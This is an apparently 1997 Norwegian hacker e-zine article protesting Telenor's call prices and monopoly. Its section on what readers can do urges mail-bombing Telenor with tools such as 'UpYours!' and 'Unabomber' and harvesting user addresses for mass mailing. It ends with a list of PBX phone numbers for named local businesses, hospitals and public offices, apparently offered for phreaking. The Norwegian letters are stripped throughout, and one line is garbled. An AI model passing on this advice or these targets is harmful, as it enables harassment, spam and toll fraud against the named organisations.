1.1 - Hva er denne artikkelen om?
1.2 - Noen fakta
1.3 - Telenors situasjon i dag (Priskningen)
1.4 - Hermansen fr det som han vil (Kontaktene)
1.5 - Hva skjer nr monopolet faller i 98?
1.6 - Telenors konkurrenter
1.7 - Hva kan DU gjre?
1.8 - Konklusjon
1.1 - Hva er denne artikkelen om?
Er du lei av mtte betale overpris for ringe internett? Er du lei av
at Telenor, et statsfinansiert selskap, frst lover noe og s gjr det
stikk motsatte? Det er iallefall jeg, og det er faktisk noe man kan gjre
med det... Jeg skal her si litt om Telemarkedet i Norge i dag, og litt
om fremtiden og hva vi kan gjre for bekjempe Telenors prispolitikk.
1.2 - Noen Fakta:
þ I 96 gikk Telenor ut i media (bla. p TV2 nyhetene) og lovte oss GRATIS
lokaltakst i 97. Men hva hendte i 97? Jo, de bestemte seg heller for
gjre det stikk motsatte; De satt opp taktsten p lokaltakst med hele
83%! Og n lover de oss gratis lokaltakst i 98, som om de i det hele tatt
har noe troverdighet igjen...
þ Telefonmonopolet i Norge faller 1. Januar 1998. Telenor er etter dette
ikke lenger de eneste som har lov til drive med teletrafikk her i
Norge. Det er p tide det er slutt p monopolet, ettersom de har hatt
det helt siden 1880.
þ Alminnelig, innenlands telefoni utgjr 43% av Telenors samlede inntekter.
Telenor er livredd for miste kunder (logisk - 43% er ganske mye), og
det betyr at privatbrukerne (oss) har egentlig ganske stor makt - HVIS
vi str samlet!
þ Tormod Hermansen (Telenor-sjef) har gode kontakter innenfor regjeringen,
han har etablert et nettverk av bedrifter for forberede Telenor p
konkurransen utenfra i 98 - dette kan gjre ting meget vanskelig for
selv de strste multinasjonale selskapene, for Telenor spiller p
hjemmebane og vi har sett endel ganger at Hermansen fr det som han vil.
1.3 - Telenors situasjon i dag (Priskningen)
Telenor sitter egentlig i en ganske perfekt situasjon i dag. De har monopol,
og de vet hvordan de skal utnytte det; og SAMTIDIG f folk til tro at
de "Senker prisene drastisk" og bare tenker p alles beste. "Vi senker
prisene med over 70%" heter det s fint, men gjr de egentlig det?
NEI! De har faktisk satt opp prisene, og tullingene som trodde Telenors
fagre lfter i begynnelsen av 97 (Foreldrene dine kommer sikkert inn under
den katagorien) finner nok ut, at prisene faktisk har STEGET hvis de
sammenligner telefonregningen fr og etter rsskiftet. Mens de satt ned
fjerntakst prisen med 70% satt de sammtidig opp lokaltakst prisen med 80%!
Og de fleste merker nok heller de 80%'ene fordi de mye oftere ringer til
bekjente i sin egen kommune eller nabokommunene enn de ringer til folk langt
Og dette merker iallefall vi internett brukere skikkelig. Fra betale 4,6kr
fr nyttr m vi n betale 8,x per time. Dette virker kanskje ikke mye hver
time, men det blir endel nr man kommer opp i antall timer. (Hvis feks.
regningen var p 2000 gjennomsnittlig i 96, kan den godt bli nrmere 4000
At Telenor i det hele tatt kommer seg vekk med et slikt overtramp er helt
utrolig, men som sagt; Hermansen har mange kontakter etter sine r innenfor
Jeg kan jo ogs legge til at i dag har Telenor praktisk talt ikke bare
monopol p telefoni i norge, men ogs p internett oppkobling. Etter
fusjonen med SN har de n 80% av markedet, og dette gjr det vanskelig
for smbedrifter ta opp kampen om prisene (Det er imidlertid noen som
gjr en god innsats, les mer om dette under 'Hva kan du gjre?')
Telenor har videre bygget ut et nettverk av investeringer innenfor 108
ulike selskaper i inn- og utland. De forbereder seg godt p dagen monopolet
faller ved opprette avtaler med store selskaper (feks. Statoil), invistere
her og der, og fr godt med penger av staten. Feks. har de aksjer i Elkjp,
s hvis du kjper noe der, gr 10% til Telenor (Moral: boikott Elkjp!)
Sprsmlet er; HVOR har de ftt pengene til invistere i alle slags
forskjellige selskapet, og skape seg dette nettverket? ... Jo, det fr
du vite mer om her;
1.4 - Hermansen fr det som han vil (Kontaktene)
Som statsselskap har Telenor en generalforsamling som bestr av en enkelt-
person; Samferdselsministeren. Denne generalforsamlingen er som kjent
Kjell Opseth og Sissel Rnbeck; Hermansens partifeller! (Skulle ikke forundre
meg om disse ogs var personlige venner), for illustrere dette litt
enklere i ascii, blir kommandolinjene slik: (verst har mest makt.)
³ Samferdsels- ³
³ departamentet ³
³ ³
³ ³
³ ³
³ ³ Statens ³ ³
³ ³ Teleforvalting ³<ÄÄÄÄÙ
³ m/Hermansen ³<ÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ ³
Vi ser her to ulike som kan gi Telenor "ordrer" eller plegg, Samferdsels-
departamentet og Statens Teleforvalting. Samferdselsdepartamentet str
igjen over Statens Teleforvalting, og kan sette til side deres plegg.
Og da, er jo Samferdselsdepartamentet de eneste Telenor trenger forholde
seg til, og de har jo Hermansen i sin hule hnd. Et eksempel p Hermansens
kontakter der, og at Statens Teleforvalting er "under" Samferdsels-
departamentet finner vi i Teletopia saken: (BT 02.04.97)
"I to r har det vesle nisjefirmaet Teletopia AS kjempet for konkurrere
med Telenors datterselskaper, blant annet innen teletorg-tjenester.
Statens Teleforvalting pla Telenor gi Teletopia telelinje p samme
vilkr som Telenors egne bedrifter. Telenor klaget til Samferdsels-
departamentet. Dagen etter ble teleforvaltingens plegg satt til side.
(...) verste ankeinstans i telesaker er alts Telenors eier og general-
Videre i BT/Stavanger Aftenblad/Adresseavisen samme dag;
"Men det finnes gode eksempler p at nr Tormod Hermansen har ftt en
overbevisning om hva som er rett, s blir det etter hvert ogs Ap-
regjeringens offisielle politikk."
Er dette det man kaller en korrupt regjering eller hva?
Et annet eksempel p at Hermansen fr det som man vil finner man i 1996,
nr han fant ut at Telenor trengte litt mer penger for lage nettverket
sitt (som jeg skrev litt om tideligere). Samferdselsdepartamentet foreslo
da at 2 milliarder av Telenors statsgjeld skulle omgjres til Egen-
kapital (dvs. de fikk 2 milliarder av staten). Hvorfor skal egentlig
Stortinget bruke skattebetalernes penger p noe slikt?
Og hva vil konkurransemyndighetene (EFTA) og ES-organene mene om et
marked der den helt dominerende av konkurrentene kan f innsprytinger
fra statskassen? Jeg skal vre den frste som anmelder dette tilfellet
enten til ES-organene el. EFTA hvis noe slikt skjer i 98.
Kort sagt; Hermansen har kontakter s det holder, og det kan bli vanskelig,
selv for de skikkelig store multinasjonale selskapene komme inn p det
norske markedet. Vi som privatbrukere kan imidlertid gjre noe med dette
(les videre..)
1.5 - Hva skjer nr monopolet faller i 98?
Ingen vet hva som vil komme til skje her i norge etter monopolets fall
1. januar 1998. En ting er sikkert; utenlandske (og kanskje norske) selskaper
vil prve seg, iallefall p bedriftsmarkedet. Men det som teller for oss,
er om vi vil f stor konkurranse p privatbrukermarkedet. Det er det som
bestemmer om vi fr gratis lokaltakst eller ikke.
Slik funker det i 98:
Konkurrentene har 2 muligheter til tilby oss privatbrukere tele-tjenester
1) Sette opp nye linjer
2) Leie linjer av Telenor
Frste mulighet er omtrent utelukket, ettersom de da m legge nye linjer
inn til hver eneste husstand, og det vil bli *DYRT*. S deres eneste mulighet
blir da LEIE linjene til Telenor. Staten skal sette en maxpris som Telenor
kan ta i leie, men noe sier meg at denne kan bli HY (Det har jo vist seg
tideligere at Hermansen fr det som han vil...)
Hvordan ser da mulighetene ut for vre privatbrukere; JO - VELDIG DRLIGE!
Selskaper tr kanskje ikke prve seg p privatbruker markedet hvis Telenor
tar HY leie, og da blir det ikke noe bedre for oss i det hele tatt. Hvis
vi ser p England for eksempel; Der falt telemonopolet for 10 r siden,
likevel har British Telecom fremdeles 90% av markedet! - Og det er godt
mulig det samme skjer her i Norge; Telenor beholder markedet, og vi fr
null konkurranse p privatbrukermarkedet, og dermed; Telenor har fremdeles
Som sagt; Telenor vil ogs i fremtiden eie linjene her i norge, s hvis
du velger en annen operatr enn Telenor, m du sannsynligvis betale linje-
leie til Telenor, og dette kan igjen medfre at det blir dyrere velge
en av konkurrentene. Telenor har helt klart et godt kort p hnden der.
Det ser ikke lyst ut, men fortvil ikke, det er fremdeles hp :) for Telenor
kan f konkurranse:
1.6 - Telenors konkurrenter
Det finnes 3 internasjonale giganter (og Telenor er som en microcar i forhold
til en lastebil mot disse):
Concert - British Telecom
~~~~~~~ Amerikanske MCI
(Telenor er med i denne)
Global One - Amerikanske SPRINT
~~~~~~~~~~ Deutsche Telecom
France Telecom
World Partners
Alle disse 3 vil trolig prve seg p markedet i norge. Men de vil frst
og fremst satse p bedriftmarkedet; og forutsetningen for at de skal
prve seg p privatbrukermarkedet er nettopp; om leien for Telenors linjer
blir lav nok...
Videre vil Telia (Det svenske teleselskapet) trolig bli den bitreste
konkurrenten til Telenor, og Telia vil frhpentligvis ogs prve seg
p privatbrukermarkedet her i Norge. Selvflgelig p samme forutsetning
som de andre har. (Ingen kan prve seg hvis leieprisen p linjene blir
urimelig hy)
Tele2 kan ogs nevnes, det er mulig de har tenkt satse p privatkunder,
hvis vilkrene blir gode nok (som i de andre tilfellene)
Forsvarets kommunikasjonsnett kunne ogs vrt brukt til telenett, men
staten valgte utelukke denne muligheten. S der har man ingen ting
En konkurrent som kanskje ikke s mange hadde forventet, kan faktisk bli
kraftverkene i norge! De har allerede telenettverk som de bruker i kontroll,
overvking og styring av sine anlegg. Og de kan ogs bygge ut fiberoptisk
telenett p strmkablene sine som allerede gr til alle husstander over
hele landet. (Fiberoptisk = RASK internett oppkobling :)) Og en ny teknologi
som gjr det mulig spinne fiberoptiske kabler rundt hyspentlinjene,
gjr at kraftselskapene faktisk kan sette opp et slikt nett langt billigere
enn Telenor som m grave ned kablene. S, konklusjonen her m vre at
kraftselskapene faktisk kan bli en meget interessant konkurrent til Telenor.
(EniTel AS og El-Tele AS er 2 giganter her)
Vi kan hpe p at det blir mange om kjttbeinet etter 98, for dess mer
konkurranse dess bedre blir det for oss...
1.7 - Hva kan DU gjre?
Som jeg nevnte tideligere s utgjr vi (vanlig telefoni) 43% av Telenors
totale inntekter, og dette er mye. Samlet er vi sterke, mens en og en er
vi ingenting. S, for at du skal utrette noe, kan det vre en ide komme
i kontakt med andre, som fex. melde deg inn i IBIO (Internettbrukernes
interesseorganisasjon), denne finner du p:
Abbonomentet koster imidlertid 100kr :(, men det gr jo til et godt forml.
IBIO er en seris organisasjon, og de jobber stadig med bedre internett-
brukernes kr. De har alltid en advokat som plager Telenor ;)
Du kan ogs ta en tur innom 'Si Nei Aksjonen' p
og Teleslakt (mer useris) p
Det finnes ogs andre ting du kan gjre:
- Du kan sende emails til telenor, og fortelle dem hva du syntes om
'pris-senkingen' deres, og nr du frst er i gang kan du godt sende emailen
med et program som 'UpYours!' eller 'Unabomber' slik at de fr et par 100
kopier av beskjeden din ;) (Stikk innom for adresser)
- Skrive innlegg i avisene om Telenor (feks. leserinnlegg), feks. om den
sannhet at de LOVTE gratis lokaltakst i 1997, mens de i realiteten satt
opp prisen med 80% - jeg tror ikke dette faktum har vrt noe srlig oppe
i media.
- Ytre meningen din om Telenor uansett hvor du er, feks. p kanaler p IRC,
og andre steder du fr sjansen.
- Maile folk p og (de som bruker Telenor frivillig)
serise mails som forklarer Telenors 'loving og lyging' og evt. vise
til tilbud hvor de ville f billigere internet oppkobling, og gi dem
http adresser til sider som tar seg av emnet (feks. IBIO's side).
Stikk innom og og list alle userne, feks hvis
et directory heter;
s vil adressen hans antageligvis vre kjetolaX0B1.8 - Konklusjon
Konklusjonen m vre at Telenor p vr bekostning prver tyne de siste
kronene ut av telemonopolet fr det oppheves i 98. S, nr vi kommer til
98 - vr nkterne i valg av operatr, og husk hva Telenor gjorde og
sansynligvis ogs kommer til gjre; Velg en av de andre leverandrene
da, slik at vi fr konkurranse p markedet, og dermed billigere priser.
Norwegian: Hordaland PBX List!
Alrek Studenthjem - 55291802
Arbeidskontoret i Arna - 55243890
Arbeidskontoret i Fyllingsdalen - 55168910
Arbeidskontoret p Nesttun - 55135330
Arbeidskontoret p Osyro - 56304695
Bergen Airport Hotel - 55229236
Bergen Tekniske Fagskole - 55232582
Betanien Hospitalet - 55166979 - fax!
Datainstrument A/S - 55314390 - etter stengetid??
Den Norske Bank - 56302071
Inter Revisjon Bergen - 55295201
Jebsens Management A/S - 55310606
Knappentunet - 55124299
Norsk Blikkvalseverk A/S - 55341260
Olaviken Behandlingssenter - 56149798
Os Likningskontor og Folkeregister - 56301299
*Statens Dykkerskole - 55268904
Statens Hgskole for kunsthndverk og design - 55311943
Steen-Hansen F Malings- og Lakkfabrikk A/S - 55100040
Stolz Rthing AS - 55345560
Vestlandet Kompetansesenter - 55296485
Bjrketeigen - 56555710
Norheimsund Yrkesskule - 56551530
Toloheimen - 56552030
Arbeidskontoret i Knarvik - 56352330
Odda Plast AS - 53644480
Solid Vedlikehold AS - 56334275
To find out just how much it costs you to call these pbxs, dial 80031031 for
Telenor's price information service.
Ending Notes
: : This mag was created by TBH! It'll be
: BLACK HACKER MAGAZINE! : the last release under the name TBH,
: ____ _________ ______ : since we're now changing the groups
: __/ /_\_ /_\_ _ \______ : name to NS! (No Shit!).
: / _ /_ _ /_ \ _ /_ :
: /____ / /___/ /__\ / / : Hope you enjoyed the mag!
: mSO/______/__/______/____\/ / :
: /____/ :
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